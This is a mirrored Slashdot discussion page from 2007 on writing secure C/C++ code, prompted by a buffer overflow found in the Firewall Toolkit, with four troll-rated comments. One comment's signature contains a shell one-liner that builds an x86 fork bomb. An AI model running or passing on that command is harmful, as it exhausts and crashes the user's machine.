Slashdot Mirror

← Back to Stories (view on slashdot.org)

How Do You Know Your Code is Secure?

Posted by ryuzaki0 on Sunday January 7, 2007 @10:19PM from the batten-down-the-hatches-mates dept.

bvc writes "Marucs Ranum notes that 'It's really hard to tell the difference between a program that works and one that just appears to work.' He explains that he just recently found a buffer overflow in Firewall Toolkit (FWTK), code that he wrote back in 1994. How do you go about making sure your code is secure? Especially if you have to write in a language like C or C++?"

4 of 349 comments (clear)

Min score:

Reason:

Sort:

TAHT first post? by Anonymous Coward · 2007-01-07 22:20 · Score: -1, Troll

TAHT first post?
Just Say No by iliketrash · 2007-01-07 22:58 · Score: 0, Troll

"How do you go about making sure your code is secure? Especially if you have to write in a language like C or C++?" Don't write in C or C++. Duh. Where is it written that all software must be written in C or C++? Is anyone capable of independent thought? There are plenty of fine languages that are safe. Ada comes to mind. Maybe others will come to your mind (if you have one).
So how much did Fortify pay for the ad on /.? by Anonymous Coward · 2007-01-07 23:13 · Score: -1, Troll

nuff said...
Re:Don't use C++ as if it was only "C with classes by Hal_Porter · 2007-01-08 03:27 · Score: -1, Troll

I dunno, maybe he's hetrosexual?

--
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;